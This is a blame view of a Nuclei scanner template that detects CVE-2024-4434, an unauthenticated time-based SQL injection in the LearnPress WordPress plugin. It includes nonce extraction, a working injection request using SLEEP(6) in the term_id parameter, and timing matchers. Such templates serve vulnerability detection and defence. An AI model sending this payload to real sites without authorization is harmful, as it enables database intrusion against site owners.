daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2024/CVE-2024-4434.yaml

59 lines
2.3 KiB
YAML
Raw Normal View History

add CVE-2024-4434
2024-06-27 18:22:53 +00:00
id: CVE-2024-4434
info:
name: LearnPress WordPress LMS Plugin <= 4.2.6.5 - SQL Injection
author: securityforeveryone
severity: critical
description: |
The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the term_id parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
remediation: Fixed in 4.2.6.6
reference:
- https://inky-knuckle-2c2.notion.site/Unauthenticated-SQLI-in-Learnpress-plugin-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-wordpress-lms-plugin-4265-unauthenticated-time-based-sql-injection
updated matcher
2024-07-04 08:08:57 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2024-4434
add CVE-2024-4434
2024-06-27 18:22:53 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-4434
epss-score: 0.00063
epss-percentile: 0.2659
metadata:
verified: true
updated matcher
2024-07-04 08:08:57 +00:00
max-request: 2
add CVE-2024-4434
2024-06-27 18:22:53 +00:00
publicwww-query: "/wp-content/plugins/learnpress"
tags: cve,cve2024,wp,wp-plugin,wordpress,sqli,learnpress
minor update
2024-07-01 10:54:51 +00:00
add CVE-2024-4434
2024-06-27 18:22:53 +00:00
variables:
num: "{{rand_int(10000, 99999)}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
minor update
2024-07-01 10:54:51 +00:00
@timeout 20s
add CVE-2024-4434
2024-06-27 18:22:53 +00:00
POST /wp-json/lp/v1/courses/archive-course?term_id={{num}})+OR+SLEEP(6)+--+A HTTP/1.1
Host: {{Hostname}}
X-WP-Nonce: {{nonce}}
update matcher
2024-06-27 20:07:55 +00:00
add CVE-2024-4434
2024-06-27 18:22:53 +00:00
matchers:
- type: dsl
dsl:
fix
2024-06-27 18:28:38 +00:00
- 'duration_2 >= 6'
- 'status_code_2 == 200'
updated matcher
2024-07-04 08:08:57 +00:00
- 'contains(content_type,"application/json")'
- 'contains_all(body_2,"No courses were found","success")'
update matcher
2024-06-27 20:07:55 +00:00
condition: and
add CVE-2024-4434
2024-06-27 18:22:53 +00:00
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- '"nonce":"([a-z0-9]+)","is_course_archive"'
internal: true
Auto Template Signing [Thu Jul 4 08:18:06 UTC 2024] :robot:
2024-07-04 08:18:06 +00:00
# digest: 4a0a00473045022100805a19beed0925918e48fe60dabee80e439f5ff19ca82f8de67f3ae2e519961002203b48fc2db31392293b96ed2bc9fd008e41f94a023be3e094412dd969f8b06752:922c64590222798bb761d5b6d8e72950